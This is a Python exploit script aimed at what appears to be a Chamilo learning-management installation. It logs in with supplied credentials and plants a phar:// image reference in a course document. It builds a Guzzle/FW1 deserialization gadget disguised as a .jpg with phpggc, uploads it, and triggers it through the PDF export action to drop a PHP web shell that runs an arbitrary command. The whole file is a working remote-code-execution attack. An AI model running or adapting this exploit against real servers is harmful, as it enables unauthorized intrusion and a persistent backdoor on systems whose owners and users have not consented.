RCE-Exploit.py

import string
import random
import requests
import sys
import os
import re

#proxy = { "http"  :  "http://127.0.0.1:8080", "https" :"https://127.0.0.1:8080"}

s = requests.Session()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
course_name = sys.argv[4]
command = sys.argv[5]

letters = string.ascii_uppercase
rnd_string1 =''.join(random.choice(letters) for i in range(6))
rnd_string2 =''.join(random.choice(letters) for i in range(6))

payload = '<img alt="" src="phar:///var/www/html/chamilo/app/courses/{}/document/{}.jpg" />'.format(course_name,rnd_string1)

def login():
    data_login = {'login': username, 'password': password, 'submitAuth': '', '_qf__formLogin':''}
    s.post(url+"index.php", data=data_login) 

def create_document():
    data_create_document = {"title":"{}".format(rnd_string2),"content":payload,"urdirpath":"%2F","submit":"","_qf__create_document":"","id":0,"title_edited":"false","dirValue":""}
    s.post(url+"main/document/create_document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&dir=%2F&selectcat=".format(course_name), data=data_create_document)

def trigger_deserialization():
    r = s.get(url+"main/document/document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&id=0".format(course_name))
    links = re.findall("href=[\"\'](.*?)[\"\']", r.text)
    for i in links :
        if "export_to_pdf" in i :
            id = i[i.find("action=export_to_pdf&amp;")+28:i.find("&amp;curdirpat")]
            s.get(url+"main/document/document.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&action=export_to_pdf&id={}&curdirpath=%2F".format(course_name,id))

def upload_phar():
    files = {'files[]': open('{}.jpg'.format(rnd_string1),'rb')}
    s.post(url + 'main/inc/ajax/document.ajax.php?cidReq={}&id_session=0&gidReq=0&gradebook=0&origin=&a=upload_file&curdirpath=/'.format(course_name),files=files)


def create_pahr():
    with open('shell', 'w') as F:
        F.write("<?php echo `{}` ;?>".format(command))

    os.system("./phpggc -p phar Guzzle/FW1 /var/www/html/chamilo/shell.php shell -o {}.jpg".format(rnd_string1))

def shell():
    r = s.get(url+"shell.php")
    print(r.text.replace('[{"Expires":1,"Discard":false,"Value":"','').replace('"}]',''))

login()
create_document()
create_pahr()
upload_phar()
trigger_deserialization()
shell()